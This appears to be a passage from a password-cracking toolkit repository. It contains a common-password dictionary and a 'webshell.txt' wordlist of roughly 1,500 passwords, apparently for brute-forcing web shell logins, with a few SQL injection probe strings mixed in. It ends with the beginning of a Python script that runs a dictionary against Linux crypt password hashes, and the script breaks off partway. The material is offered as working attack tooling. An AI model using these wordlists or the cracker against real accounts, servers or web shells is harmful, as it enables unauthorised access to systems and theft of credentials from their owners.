805 | robert 806 | roberto 807 | rock 808 | rocket 809 | romantico 810 | ronaldo 811 | ronica 812 | root123 813 | rootroot 814 | rosario 815 | rosebud 816 | rosita 817 | runner 818 | rush2112 819 | russia 820 | sabrina 821 | sakura 822 | salasana 823 | salou25 824 | salvation 825 | samantha 826 | sammy 827 | sample 828 | samson 829 | samsung 830 | samuel22 831 | sandra 832 | santiago 833 | santos 834 | sarita 835 | saturn 836 | scooby 837 | scooby1 838 | scooter 839 | scorpio 840 | scorpion 841 | scott 842 | seagate 843 | sebastian 844 | secret 845 | secure 846 | security 847 | septiembre 848 | sergio 849 | servando 850 | server 851 | service 852 | sestosant 853 | sexsex 854 | sexy 855 | shadow 856 | shadow1 857 | shalom 858 | shannon 859 | share 860 | shaved 861 | shit 862 | shorty1 863 | sierra 864 | silver 865 | sinegra 866 | sister12 867 | skippy 868 | slayer 869 | slipknot 870 | slipknot666 871 | slut 872 | smith 873 | smokey 874 | snoopy 875 | snoopy1 876 | snowfall 877 | soccer 878 | soccer1 879 | soccer2 880 | soledad 881 | sonrisa 882 | sony 883 | sophie 884 | soto 885 | soyhermosa 886 | spanky 887 | sparky 888 | spider 889 | spirit 890 | sql 891 | sqlexec 892 | squirt 893 | srinivas 894 | star 895 | stars 896 | startrek 897 | starwars 898 | steelers 899 | steve 900 | steven 901 | sticky 902 | student 903 | stupid 904 | success 905 | suckit 906 | sudoku 907 | summer 908 | summer1 909 | sunshine 910 | super 911 | superman 912 | superman1 913 | superuser 914 | supervisor 915 | surfer 916 | susana 917 | swimming 918 | sydney 919 | system 920 | taylor 921 | taylor1 922 | teacher 923 | teens 924 | tekila 925 | telefono 926 | temp 927 | temp! 928 | temp123 929 | temporary 930 | temptemp 931 | tenerife 932 | tennis 933 | tequiero 934 | teresa 935 | test 936 | test! 937 | test123 938 | tester 939 | testing 940 | testtest 941 | thebest 942 | theman 943 | therock 944 | thomas 945 | thunder 946 | thx1138 947 | tierno 948 | tiffany 949 | tiger 950 | tigers 951 | tigger 952 | tigger1 953 | time 954 | timosha 955 | timosha123 956 | tinkerbell 957 | titimaman 958 | titouf59 959 | tits 960 | tivoli 961 | tobias 962 | tomcat 963 | topgun 964 | toyota 965 | travis 966 | trinity 967 | trouble 968 | trustno1 969 | tucker 970 | turtle 971 | tweety 972 | tweety1 973 | twitter 974 | tybnoq 975 | underworld 976 | unicornio 977 | united 978 | universidad 979 | unknown 980 | vagina 981 | valentina 982 | valentinchoque 983 | valeverga 984 | veracruz 985 | veritas 986 | veronica 987 | victor 988 | victoria 989 | victory 990 | video 991 | viking 992 | viper 993 | virus 994 | voodoo 995 | voyager 996 | walter 997 | warrior 998 | web 999 | welcome 1000 | welcome123 1001 | westside 1002 | whatever 1003 | white 1004 | wiesenhof 1005 | william 1006 | william1 1007 | willie 1008 | willow 1009 | wilson 1010 | windows 1011 | winner 1012 | winston 1013 | winter 1014 | wizard 1015 | wolf 1016 | women 1017 | work123 1018 | worship 1019 | writer 1020 | writing 1021 | www 1022 | xanadu 1023 | xavier 1024 | ximena 1025 | ximenita 1026 | xxx 1027 | xxxx 1028 | xxxxx 1029 | xxxxxx 1030 | xxxxxxxx 1031 | yamaha 1032 | yankee 1033 | yankees 1034 | yankees1 1035 | yellow 1036 | yeshua 1037 | yoteamo 1038 | young 1039 | ysrmma 1040 | zapato 1041 | zirtaeb 1042 | zxccxz 1043 | zxcvb 1044 | zxcvbn 1045 | zxcvbnm 1046 | zxcxz 1047 | zxczxc 1048 | zzzzz 1049 | zzzzzz -------------------------------------------------------------------------------- /crackform/dict/webshell.txt: -------------------------------------------------------------------------------- 1 | pass 2 | 598971996 3 | adminyouge 4 | sbadmin 5 | mkak5cpa 6 | 040627 7 | 123 8 | xx 9 | 987987 10 | adminasb 11 | admin 12 | 111 13 | qwe124 14 | x1 15 | 518518 16 | abc321 17 | ssss 18 | 1208 19 | xiaoya 20 | 33890 21 | ysyoubi 22 | heiwushi 23 | 860074 24 | UM 25 | zgd 26 | sbsb 27 | honker 28 | kucha 29 | hou6364 30 | buyi 31 | 132333 32 | weiye 33 | 496346361 34 | caonima4 35 | sxl1992 36 | 1313 37 | MxiangZy 38 | nick 39 | 1 40 | abchin 41 | a 42 | kevin 43 | longyuan 44 | 5584066 45 | yxy 46 | xiaomage 47 | 85985 48 | chenyi 49 | lyc 50 | 1991212 51 | mydoor 52 | skwr 53 | 912500 54 | 1111 55 | HSQ 56 | chao 57 | chinanet 58 | lost_hero 59 | love 60 | baidu.com 61 | woaini 62 | 9452626618 63 | 9989 64 | wp_jx 65 | 5 66 | abchina 67 | qiang 68 | xiaoyindanteng 69 | maohou 70 | killer 71 | XYCNM 72 | iamd3d4 73 | p 74 | baiduyouhua 75 | lions 76 | 908677649 77 | hackcy 78 | haoqing 79 | 8428 80 | admin1 81 | zeracker 82 | 123456520 83 | 7369983 84 | hackhl 85 | popowk 86 | ff1 87 | exeHack 88 | cmh147369 89 | NULIZHU 90 | fangjunhui 91 | 852255 92 | www.cqtoo.com 93 | fuck 94 | r 95 | xz. 96 | ** 97 | 1qaz!QAZ 98 | c 99 | 2012bhezuo 100 | heczhuo2012 101 | sbadmin$ 102 | ahezuo2012 103 | admins 104 | tang 105 | cn0xsuc 106 | 123456 107 | mrbig 108 | 5450_ 109 | 495861595 110 | 1qaz2wsx 111 | az422325 112 | shusheng 113 | 599783 114 | admin110 115 | 8686 116 | 429 117 | 4324663 118 | uiko 119 | eeeee 120 | yanghai 121 | bhezuoaaa2012 122 | 37heuozaaa21 123 | hqg 124 | fou 125 | ly 126 | 37hehezuosa21 127 | hack1990 128 | hezhuoabc2012 129 | host 130 | hcdaociyiyou 131 | 2008 132 | starbaby 133 | 520 134 | weilizhan 135 | baishikele 136 | admin888 137 | xue 138 | 258468 139 | 640325 140 | 111222 141 | kisslwl 142 | 986072190 143 | 5174187 144 | caonima@123 145 | 1212121 146 | 9510 147 | 5450 148 | lemonTREE 149 | zhfblue 150 | 130130 151 | kevin@123 152 | fuckyou 153 | henry 154 | sys123456 155 | zixuan 156 | 243222 157 | and 158 | opopop 159 | chouxiaozi 160 | Dkillshell 161 | hackdl 162 | UMSH8949 163 | 889950 164 | coup 165 | Angry boy 166 | Angry boy* 167 | loveduck1 168 | baimeigui 169 | 9 170 | 88385850 171 | admin0 172 | 123456x 173 | 54188 174 | xxxxxx 175 | jj5144929 176 | S.Trojan* 177 | 502 178 | foguang 179 | cracker 180 | maya66 181 | 123123 182 | luobo 183 | 2234041 184 | 6950018 185 | axing 186 | hackerxl 187 | 689264 188 | shell 189 | xoxlil 190 | exeHack3Kin 191 | admin123 192 | zero 193 | xugeh1999@163.com 194 | x2b 195 | oo00123.. 196 | jiujie 197 | qaz521 198 | tattoo 199 | WUJINGQUAN 200 | baidu 201 | 8460032 202 | adminsb 203 | 95599 204 | vv 205 | yangyang 206 | 48592 207 | nishibaichi 208 | xiaoshu* 209 | 210 | " 211 | 12 212 | 12 and 1=1 213 | 12 and 1=2 214 | 7daiyongheng 215 | 19920528 216 | 911300 217 | zuanjie 218 | qianyue 219 | zunshao 220 | weirdsun 221 | awen 222 | xueqilin 223 | 5921 224 | xiaoc 225 | sbhack 226 | 1314520 227 | sb 228 | adnin 229 | hackanby 230 | dan 231 | slaiwl 232 | woshiyizhizhu 233 | sbadmin386 234 | hackdingding 235 | 000123 236 | 12393123 237 | nizhenyu 238 | Script 239 | 246855qq 240 | tianzang 241 | wangbo 242 | 4882265 243 | yaoshi521 244 | baoli 245 | sb250 246 | soy 247 | index 248 | wakakarile 249 | farmer 250 | suanle. 251 | kossin 252 | kevinisgood@123 253 | adminlihuan 254 | 5824485 255 | oday8520 256 | 722248 257 | wosyuanxiao 258 | heiweiadmin888 259 | 13421580161 260 | 23 261 | zy 262 | 521837 263 | cherishtang 264 | 38753 265 | yelao 266 | 19950921 267 | 215632 268 | 839675010aa 269 | 654321 270 | hackxiaotao 271 | heimao 272 | yin 273 | 928505054 274 | fenice 275 | yk 276 | wo 277 | lovecat 278 | 7234112 279 | admin8888 280 | wlana.net 281 | 0.0 282 | QQ191029886 283 | chuyincrazy 284 | hankai 285 | pass 286 | 930508 287 | admin111 288 | asd*web 289 | hankai95599 290 | * 291 | cf1230 292 | Hack7711 293 | i@mkiller 294 | wuer2011 295 | zcy80382363 296 | 7j.net 297 | aksqliupei 298 | uu000 299 | h4ck3am 300 | asdfgh123 301 | 563975491 302 | keyinwang 303 | z371601153d 304 | www813 305 | th@nks 306 | 6550771 307 | jie 308 | 8420407 309 | qq296471901 310 | qq954101430 311 | laodeng 312 | pangolin 313 | www.qingxu.com 314 | 77344098 315 | adminfa 316 | select web from shell 317 | aaaaa 318 | caijiache1 319 | mymuma_admin 320 | sxmd 321 | hackbyL 322 | 110a 323 | 0000henduo0 324 | zzwl 325 | linksys 326 | 41388482 327 | shandian 328 | kiss 329 | 2411 330 | 599023896 331 | Cnhuker-Ker 332 | *123789 333 | 110 334 | asdasd 335 | z 336 | hack200 337 | baiduwocaoni74 338 | 2010 339 | woshishei 340 | 1007 341 | thething456 342 | sin 343 | 1303098896 344 | xiao 345 | 7788 346 | jianlong 347 | mywife 348 | yazi 349 | 1996214002 350 | cmd 351 | showcctv 352 | ceshi2009 353 | ziao 354 | ju1213 355 | 77520 356 | 2211997 357 | caonijiji110 358 | adminadmin 359 | 8800 360 | jcaini 361 | 1313 362 | 0 363 | 3088582 364 | 2125090 365 | hackxiaoxi 366 | baichi 367 | huahua 368 | 506 369 | 1467999 370 | !@#asd 371 | 5112 372 | 955006 373 | 5201314 374 | aishang 375 | zhuagou 376 | 147258 377 | 82834348 378 | yilu 379 | niu38 380 | anzhu 381 | ghost 382 | 9527 383 | vvvvv 384 | 198937abc 385 | lixiang 386 | 7 387 | xcbwxy 388 | sukiler 389 | 7758258 390 | zzzaaaqqq 391 | rinima 392 | 1818 393 | 163.com 394 | 640325 395 | zhouyl218 396 | 19860625 397 | xiaohao 398 | 7895123 399 | webshell 400 | jbb 401 | holy28 402 | nidaye 403 | xiaofeng 404 | hkmm 405 | 349795461 406 | fuck133 407 | 516518 408 | a123123 409 | Rascal 410 | sdfsdf 411 | only 412 | 19851230 413 | guihuan 414 | 333 415 | qwe 416 | chen 417 | 379078012 418 | dingzylu520 419 | 520 420 | muxiaku 421 | Google 422 | hello 423 | 123581 424 | music 425 | asdmin22446688 426 | 123qaz 427 | bs 428 | mimads 429 | 123321 430 | wangxiao 431 | xiaoyang520 432 | lihack888 433 | 962464 434 | left1989 435 | 581513 436 | tiantian 437 | #753369 438 | harley 439 | tsyj 440 | 2009 441 | qinqin 442 | liuliu 443 | 1.21121E+12 444 | 984674862 445 | 1841562 446 | 1314 447 | ceshi2009qq 448 | xiaobao 449 | 1987 450 | nihaoma 451 | bear 452 | hacker 453 | xiaoyan68 454 | xiekekevin@123 455 | yjq 456 | 247710379 457 | mahe 458 | laobai 459 | bushiba 460 | mark@zhu 461 | 16897168 462 | 21472531 463 | 8923 464 | 2599 465 | gucci 466 | 1121 467 | akg 468 | fc03112 469 | 1.20914E+12 470 | hxhx 471 | freeast 472 | yeyuhack! 473 | dark 474 | 121322 475 | tao0921 476 | 1234 477 | 1314520 478 | zpadmin 479 | 978332153 480 | jj520jj 481 | 76025 482 | handsome 483 | 8954251 484 | zxl 485 | 5542015a 486 | 12111 487 | forget 488 | 225588 489 | hxw 490 | 3328 491 | 596861877 492 | 123123 493 | 13144461 494 | hao 495 | JimoDao 496 | c32 497 | gz 498 | 7477917 499 | luozhiwei 500 | hack121314 501 | 147258aa 502 | seo007 503 | vip 504 | tt 505 | 8.4607E+11 506 | nihaosb 507 | 5450 508 | bobo 509 | hack1314 510 | laj1o0 511 | 777 512 | qn888 513 | 6625958 514 | shitpowereasy2006 515 | 5.20131E+14 516 | yaoxiao123 517 | 1992 518 | 6390220 519 | hello123 520 | xiaobin 521 | 9874123 522 | #test 523 | kaiter 524 | woai2008 525 | 379920779 526 | sdj 527 | wangan 528 | heikexiaodong 529 | kangxi 530 | fuck3306 531 | anshack 532 | 999 533 | zuoye 534 | 6250981 535 | hanghang 536 | dns 537 | 54lizhijie 538 | asa609851972 539 | 3344179 540 | 248646 541 | hosty 542 | 111111 543 | 512 544 | aaa 545 | xiaolin 546 | 842811 547 | heikeyh 548 | hack66 549 | 678891 550 | 7834115 551 | 3221888 552 | 5 553 | heimajia 554 | 19880829 555 | hack125 556 | xx123 557 | huke 558 | qwewer 559 | zhang 560 | cnwebshell 561 | 119002602 562 | fuckyoumama 563 | yanjing 564 | 1973asd 565 | 89694959 566 | shendao123123 567 | henry@@@ 568 | st999 569 | dragon 570 | shitou 571 | ruohan 572 | dange 573 | zzx 574 | 1232813 575 | 123654 576 | ren 577 | yzp 578 | lnalife 579 | 940302m 580 | wykyang 581 | cctvgo 582 | eycgj5!1 583 | kack 584 | heise007 585 | w583017 586 | matt 587 | 851022 588 | xiaosheng 589 | jianhen 590 | ying 591 | hehaifeng 592 | hack888 593 | RulyHacker 594 | 5201315 595 | zbqls 596 | 3182145 597 | 521125 598 | 1230871 599 | jx119 600 | 254933568 601 | 24657910 602 | 6507525 603 | happy 604 | huanglin 605 | feifei1993 606 | 12580 607 | log 608 | silence 609 | youhua123 610 | longxiao 611 | Freetest 612 | 520121 613 | xiaoxin 614 | fack 615 | 18490777 616 | 40627 617 | wangzi 618 | 1989 619 | QINXIN 620 | b 621 | 20738118 622 | # 623 | sai 624 | 792217135 625 | lovebing 626 | 5747970xxxx 627 | 13569134135 628 | 74520 629 | banlulu 630 | 680807 631 | xiaocheng 632 | buzhidao 633 | theying 634 | latcue 635 | lec00520 636 | hukeke 637 | hack19 638 | hyj123 639 | yy1995taizi 640 | cs 641 | 2010vip 642 | 147 643 | lei 644 | hiadmin 645 | rlz 646 | xiaolin! 647 | sky0926 648 | 12345 649 | yeyuhack 650 | amalajisi401 651 | mm 652 | 82488 653 | 586334 654 | hack1990.com 655 | . 656 | password 657 | sinxiaoye 658 | helloworld 659 | uikoaba 660 | hackdream 661 | hackxl 662 | hongyang 663 | hanxiaolong 664 | 881211 665 | 520520 666 | 215489 667 | woailuo123 668 | 1992724 669 | alexlouis 670 | bingbing 671 | 648879852 672 | lklk 673 | forgiveme 674 | sa 675 | 1022 676 | 168888 677 | happydjzq 678 | madman 679 | black 680 | luoye123 681 | 2791600 682 | wuzhe 683 | 90616 684 | 12213514 685 | endover 686 | Qzl151727 687 | 51496419101 688 | ilovecy1314 689 | 59336356 690 | op 691 | hslm 692 | 381639825 693 | nimade748 694 | hidden 695 | yidianyu 696 | qingran 697 | 524160 698 | q11w22 699 | 1231233 700 | xiaokai 701 | 123321 702 | 142536 703 | cao 704 | zyr123456 705 | ouou 706 | hackcc 707 | hjf1987 708 | admin020 709 | 75289346 710 | 253983401 711 | 7410 712 | jtk2352 713 | xiaoailove 714 | http://honkeruser.uueasy.com 715 | maplelee 716 | 121314 717 | windd 718 | chenjun 719 | tingfeng520 720 | 569471380 721 | yinshen1 722 | woshishui 723 | hackfs 724 | #NAME? 725 | chuan7423 726 | 110120 727 | buzmdong 728 | 7v 729 | twilight 730 | 12301230 731 | 1988812 732 | 545882722 733 | qwe520 734 | jingzi 735 | 52456 736 | a123 737 | 8656739797 738 | zxy1110 739 | cange 740 | 200325 741 | 991258 742 | 709394 743 | harlan 744 | 155126845 745 | kill 746 | 6682499 747 | aspmuma 748 | 213213 749 | 4848748 750 | heimao2001 751 | 8888 752 | zhack 753 | 3209283 754 | yuanyuan 755 | fuck you 756 | 60 757 | rrtr 758 | 350214hhyu 759 | jks 760 | 123520 761 | test 762 | 831213 763 | karen 764 | aiyan1314 765 | zhangshuaixing 766 | edtd 767 | luoxue 768 | tsingfeng 769 | 120360047 770 | 2 771 | 2861872 772 | 12590 773 | 5066977 774 | yang 775 | 707145 776 | 914 777 | 2131321 778 | 417247 779 | liuxiang 780 | king520 781 | 1262643839 782 | 987 783 | xinsuei 784 | ahuyangok 785 | hackerzyx 786 | 6621469 787 | yishao147258 788 | cass 789 | 0asp 790 | dapao001 791 | hudy 792 | 159 793 | ty3112 794 | 33201314 795 | pcs 796 | maple 797 | abc520 798 | lm 799 | windows123 800 | 724612 801 | 998068 802 | 414006380 803 | 9.61272E+11 804 | Crack8 805 | aspmumaaa 806 | hkh 807 | 521433 808 | lyke@!520 809 | 8680367 810 | wocaonima 811 | asd123 812 | jiejie 813 | 121as 814 | hackbojue 815 | lmd3395093 816 | 798 817 | redshaman 818 | xkd 819 | 0316bl 820 | heyuehui 821 | #wode2010 822 | ak47 823 | 5721839 824 | lyh 825 | baidupro 826 | a364205 827 | caonima74 828 | 4860529 829 | 906 830 | 1138097393 831 | moka 832 | anliu 833 | 360 834 | huiming 835 | redstorm 836 | a19870307 837 | xiaoze 838 | a8546566 839 | ver007 840 | 2025978 841 | haha 842 | net@net 843 | system 844 | def 845 | x 846 | maizi 847 | 789 848 | 84460965 849 | 5203344587 850 | adminaaa 851 | a456 852 | sbcaonima 853 | zhougong 854 | left 855 | HEIHEI 856 | hack95 857 | 123haha 858 | 1125 859 | cuipeilong 860 | caicai 861 | zhy 862 | tianya 863 | weiwei 864 | 123456* 865 | d 866 | qiaobochao 867 | user 868 | hei 869 | tianxia 870 | 112233 871 | bluehack 872 | hehouyuan 873 | 496500954 874 | jimo 875 | 1223 876 | 100100 877 | hack6041551 878 | fengzi 879 | ajaj 880 | 8259 881 | 67898902 882 | nimujiji 883 | 6555788 884 | kldrsw 885 | sasa 886 | 911234 887 | 17193493 888 | av 889 | 52018336 890 | sea 891 | 52dbd00 892 | xgl 893 | xjiang123456 894 | andy 895 | jcksyes 896 | admin302012 897 | duoduo 898 | )) 899 | you520 900 | 1992310? 901 | sss 902 | 52hl 903 | 666666 904 | X2J 905 | wushiwang 906 | egg 907 | xiaobin@ 908 | hfclvscl2004 909 | 901220 910 | 956823 911 | 1015qin 912 | xiaonu123 913 | 19881210 914 | 688888 915 | 811023 916 | bianguolong 917 | lhlagr 918 | panda 919 | cuaini 920 | lfoptk 921 | rile 922 | walp 923 | 147520 924 | 1218 925 | 412724 926 | 201088 927 | 92242215 928 | lfoptk520 929 | qwedsapk940 930 | 12356 931 | long110 932 | rfkl 933 | 270787170 934 | haohao 935 | 199012 936 | 940208 937 | guohui 938 | 949812 939 | 8299352 940 | qwe213de 941 | 522500 942 | qweqwe9993 943 | yuletianxia_rand 944 | love0318 945 | 123741 946 | jiandan1996 947 | 31415926 948 | wy 949 | Hunter 950 | sahack767311791 951 | luyan 952 | baidu12 953 | china 954 | csh520wzn 955 | shenhui 956 | sq0301 957 | anzu 958 | 95621 959 | hackzll 960 | sthacker 961 | qjwqr 962 | yingzi 963 | 19871010 964 | zfs 965 | xf 966 | kooice 967 | 690504 968 | jjang 969 | buyaocail 970 | @pl 971 | 87966550 972 | 199561279 973 | 860608272 974 | liuxing 975 | 11111 976 | woaizuozuo 977 | 510494 978 | sexinsex 979 | end 980 | xiaoxu 981 | whj 982 | x123 983 | 376544963 984 | minzi 985 | 8 986 | alexhacker 987 | ceo521 988 | xiaoxue 989 | **************** 990 | 65585626 991 | 4882265 992 | ha 993 | 88888888888888888888a 994 | caihao 995 | 123324 996 | yixiao 997 | 521 998 | 810076219 999 | love.song 1000 | 5831616 1001 | 82590637 1002 | wang893582668 1003 | liyuru 1004 | hhtzgh 1005 | jj 1006 | qq530283046 1007 | 115555 1008 | 1231 1009 | huenke 1010 | anubis 1011 | calvin 1012 | CNHK 1013 | loveyan1314 1014 | tangwei19921004 1015 | qyjhl1 1016 | worinima 1017 | 155 1018 | 133tonghui 1019 | ox 1020 | xiaoxigua 1021 | 278 1022 | 681115 1023 | 123456sjj 1024 | loveyan 1025 | 722248 1026 | chenmo 1027 | 8462277 1028 | xssyhack 1029 | amen661 1030 | xiaojun 1031 | kakc 1032 | 338918 1033 | ç 1034 | ker 1035 | z123z123 1036 | an75 1037 | 5588 1038 | xiaoyang 1039 | keni 1040 | aiai 1041 | binzong 1042 | heiying 1043 | fuck,duck 1044 | 690 1045 | krbl123 1046 | admin520 1047 | 2857628 1048 | hackzms 1049 | xiaoluo 1050 | 511022048 1051 | fuckss1314 1052 | 14238756 1053 | darkst 1054 | meiyisi 1055 | weixiao 1056 | kanan 1057 | pingqing 1058 | 8998815 1059 | huihui 1060 | huasheng23 1061 | hongxy 1062 | nopkill 1063 | 964299095 1064 | 1478523 1065 | 1234567890 1066 | code 1067 | 1314521 1068 | soinlovely 1069 | 1324520 1070 | Icechen 1071 | 5961512 1072 | 243222 1073 | ZxC159753456 1074 | ccca 1075 | yellow 1076 | xiaozi 1077 | tzd 1078 | xiaoxu321 1079 | si1ence 1080 | t6 1081 | 简å?96 1082 | guoyunhaizhangya 1083 | xiaoyu 1084 | renxiao 1085 | 9498346 1086 | admin11 1087 | zsc21298068 1088 | goyelang 1089 | damothor 1090 | caonima 1091 | admin333 1092 | 218419 1093 | 5667626 1094 | fucks 1095 | leilei5 1096 | qianyue2691 1097 | 584078136 1098 | 99 1099 | hacker111 1100 | heishijie 1101 | jsjloveqx 1102 | kyou 1103 | 1102 1104 | liuli 1105 | 123007 1106 | 121314521 1107 | 101 1108 | huoguangzhong 1109 | caonijiji 1110 | 133135136 1111 | 12qwaszx 1112 | fuckbaidusb.com 1113 | 81001818 1114 | 553***492 1115 | 5203344 1116 | chinaclj 1117 | xo 1118 | guiying 1119 | 3160 1120 | googlehack 1121 | datxuan21 1122 | 3d6H12 1123 | val 1124 | abc10320766 1125 | 461830804 1126 | can 1127 | xxx 1128 | lelehack 1129 | 20121314 1130 | admin5 1131 | 379891987 1132 | xuqiao 1133 | dengbo 1134 | 19931205 1135 | 8220244 1136 | 386863933 1137 | dupeng 1138 | 2012hack 1139 | safetest 1140 | west 1141 | 725 1142 | tao 1143 | 393151070 1144 | bing 1145 | heilanghk 1146 | admin.com 1147 | xiao0 1148 | allan3 1149 | hack 1150 | fahaosinianzhuanyong 1151 | wolaile 1152 | 3599 1153 | shit 1154 | sq0802 1155 | hackhack 1156 | comeonbaby 1157 | 135 1158 | 520girl 1159 | bai 1160 | 649510169 1161 | guojia 1162 | feiwu 1163 | jiangyin 1164 | zzz1 1165 | nannan 1166 | 960310 1167 | qwertyuiop 1168 | 11223344 1169 | a007 1170 | 86787013 1171 | baozhi007 1172 | aa 1173 | exq 1174 | q 1175 | 2631102 1176 | nishishui 1177 | 857194 1178 | condor 1179 | hack52 1180 | hackerufo 1181 | 150 1182 | xueruan 1183 | huitailang 1184 | 88888888 1185 | hezhengliang 1186 | 540220230 1187 | 19941007 1188 | i5ON20 1189 | heiye 1190 | xiaomabi 1191 | 147852 1192 | 4069315 1193 | smilebomb 1194 | evil 1195 | quan 1196 | f4 1197 | 1183218333 1198 | ming 1199 | z94211 1200 | ytywpyty 1201 | 790043207 1202 | hlqqq 1203 | 350124418 1204 | 22397251 1205 | worinidaye 1206 | 55446135 1207 | vernon 1208 | 213 1209 | #001353 1210 | xiaoye 1211 | 19830303 1212 | 122031252 1213 | xiaofou 1214 | zxzxzx 1215 | hack555 1216 | kemm 1217 | CK 1218 | VPN 1219 | xiaoding 1220 | fuckss 1221 | 41553474 1222 | red_bean 1223 | qiyue 1224 | xiaohuke 1225 | 14 1226 | wangjing 1227 | sbhun 1228 | ye 1229 | 1211 1230 | xiaobai 1231 | menlin 1232 | 245661320 1233 | 1792860 1234 | qq 1235 | heidao518 1236 | shen101 1237 | 4625326 1238 | xieke123 1239 | rs520 1240 | 881688 1241 | mimashisha 1242 | 714831 1243 | huibi 1244 | 3253220 1245 | 1 1=2? 1246 | 13 1247 | 19970401 1248 | liu 1249 | 1995115 1250 | 19880426 1251 | 601608693 1252 | qw 1253 | 520110 1254 | 19930707 1255 | 5310994 1256 | hehe 1257 | xxyy 1258 | 199123 1259 | norain 1260 | binye 1261 | w123.a 1262 | weilipin 1263 | 321321a 1264 | p369c258 1265 | chen2008 1266 | qqq 1267 | annew 1268 | 1258 1269 | yy 1270 | 918 1271 | aleax 1272 | Jer123 1273 | smily 1274 | zdq!007 1275 | 19818 1276 | fs 1277 | lovexyz 1278 | lu66016 1279 | a123456 1280 | mengzeng 1281 | 521837 1282 | xiandu 1283 | 1357913579 1284 | daocaoren1 1285 | wfs 1286 | 5488142 1287 | xuing 1288 | pann 1289 | weiaiyang 1290 | zhangyuefen 1291 | admin624 1292 | cctvcom 1293 | zzzzzx 1294 | asa12869 1295 | 123456qq 1296 | 774677770 1297 | 77169 1298 | tom 1299 | 664938520 1300 | qingkouhe 1301 | adminhack 1302 | 12 1303 | 860622 1304 | #xiao 1305 | huimin 1306 | 760901 1307 | 375648529 1308 | 3310 1309 | 1990 1310 | guoxin666 1311 | admin889 1312 | xduo 1313 | 绝色神偷 1314 | 321aaa 1315 | fa 1316 | 528862 1317 | laji 1318 | 584520 1319 | admin838 1320 | adm 1321 | hack521 1322 | Cnak 1323 | 17729471 1324 | 1598753 1325 | ln 1326 | yuanpeiwen 1327 | 336699 1328 | 375898981 1329 | sb456 1330 | xiaozan 1331 | yh19871010 1332 | hao1234 1333 | 6303 1334 | woshiyouthhehe456aa 1335 | 12345678 1336 | moqiqwe 1337 | guojiade 1338 | bmx5wan 1339 | 19960526xiaohong 1340 | 1124 1341 | hudie 1342 | 110120130 1343 | 963 1344 | 570751460 1345 | #huaiyuqi 1346 | 398129 1347 | muxiau 1348 | 599023896huenke 1349 | IvAn1A 1350 | 321 1351 | mmxy 1352 | 349922034 1353 | 684752 1354 | A9988731 1355 | 909718296 1356 | 85979348 1357 | 41452690 1358 | as6706628 1359 | rggaini 1360 | benben 1361 | #cctv 1362 | jiong 1363 | quanxian 1364 | macro 1365 | huajiang 1366 | 777777 1367 | 199121 1368 | ftghn5 1369 | beijiyoulan 1370 | huijiale 1371 | wow 1372 | liujian 1373 | asshole 1374 | 6491283 1375 | lixin 1376 | 13920lyp 1377 | weihong 1378 | 159753 1379 | 5584094 1380 | wc 1381 | tianlang 1382 | 2362481 1383 | fuckk 1384 | baga 1385 | admin.asp 1386 | hack4717222 1387 | hacknidaye 1388 | hdhack 1389 | lu 1390 | 0b4938b71636da18 1391 | 94211 1392 | stone1024 1393 | 8023 1394 | 54huige 1395 | 58477 1396 | zhuzi 1397 | 77777 1398 | 4186537 1399 | Fw26RP 1400 | 999star 1401 | dsadwv 1402 | 1q2w3ebb 1403 | 4819 1404 | 491953881 1405 | posha 1406 | hackin 1407 | V57Ovc 1408 | 绝色神偷. 1409 | 1ef34E 1410 | danteng 1411 | wxm 1412 | #5201314 1413 | Forkert 1414 | ctshack 1415 | ruige123 1416 | 1991926 1417 | 888888 1418 | sky 1419 | fght4fdh 1420 | hackshy888 1421 | budao 1422 | cdsvev 1423 | 629007 1424 | hhuke 1425 | 888 1426 | se 1427 | hackjie 1428 | 24325981 1429 | mesl8 1430 | shengren 1431 | 513 1432 | sb123 1433 | sawdw4 1434 | 852 1435 | uijygg3 1436 | hackxcm 1437 | qq369291 1438 | pp123 1439 | 321hack520 1440 | esha 1441 | 2320421 1442 | lt 1443 | kisslove 1444 | netuser 1445 | 66 1446 | 1Y1B22 1447 | df 1448 | lee987 1449 | nimade 1450 | xy123 1451 | 7948 1452 | dsafdf 1453 | cdsfdf 1454 | sck.asp 1455 | xp 1456 | woaixiao 1457 | wei21 1458 | admin123456pass 1459 | dork 1460 | allenchen 1461 | Q23E1X 1462 | 592633631 1463 | lmrq 1464 | zhichiasp 1465 | data 1466 | operation 1467 | 541788 1468 | shine 1469 | wang 1470 | huenkek 1471 | ddaill 1472 | dianshi 1473 | 329 1474 | detf2 1475 | sorrya 1476 | 1113 1477 | meinanhui 1478 | #yiyufanjuan 1479 | kuanglang 1480 | lengyu 1481 | z111111 1482 | cd520 1483 | zuoai 1484 | pop 1485 | yanghr 1486 | 778899 1487 | aaa321 1488 | dgythss 1489 | 123s5s2 1490 | #67831046 1491 | 100200 1492 | jiazhi 1493 | 3702627 1494 | #123456 1495 | yuqing 1496 | 311s 1497 | linux 1498 | luoxiao 1499 | zh7895123 1500 | wangcun 1501 | ri 1502 | 4 1503 | wudalang250 1504 | tudi 1505 | 57575331 1506 | m0n4L5 1507 | hacksb 1508 | admin246 1509 | cnhackerpass 1510 | lamour90 1511 | xinxin 1512 | love2011 1513 | test6240 1514 | hellohello 1515 | 8835015 1516 | uweiui34 1517 | hhttd3 1518 | 33660022 1519 | 20111 1520 | hk 1521 | daokers 1522 | *wqc198983* 1523 | bschaoy 1524 | didiao 1525 | 231596 1526 | 6214 1527 | tian466699 1528 | van 1529 | cunzhang 1530 | hai 1531 | zzxz 1532 | kk 1533 | 222222 1534 | 617 1535 | fengyu 1536 | luoluo2613435510 1537 | aa123123 1538 | spirit 1539 | appoi 1540 | 38325 1541 | systen 1542 | zxczxc 1543 | 570 1544 | minjian 1545 | quan123 1546 | awsbb123 1547 | heikexiaolong 1548 | 8399842606 1549 | 72 1550 | sst 1551 | wuikma 1552 | onrush 1553 | xu147258 1554 | 3951854 1555 | zhu 1556 | 52001314 1557 | hadk 1558 | uikofuck -------------------------------------------------------------------------------- /cracklinux/crack_linux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf8 3 | 4 | import sys 5 | import os 6 | import crypt 7 | 8 | 9 | def test_pass(crypt_passwd, dict_list): 10 | """ 11 | @crypt_passwd: encrypted password 12 | @dict_list: password list 13 | """ 14 | salt = crypt_passwd[:12] 15 | for word in dict_list: 16 | crypt_word = crypt.crypt(word.strip(), salt) 17 | if crypt_passwd == crypt_word: 18 | print '[+] Found Password: %s' % word 19 | return 20 | print '[-] Password Not Found.' 21 | 22 | 23 | def main(passwd_file, dict_file): 24 | """ 25 | @passwd_file: to crack the account password file 26 | 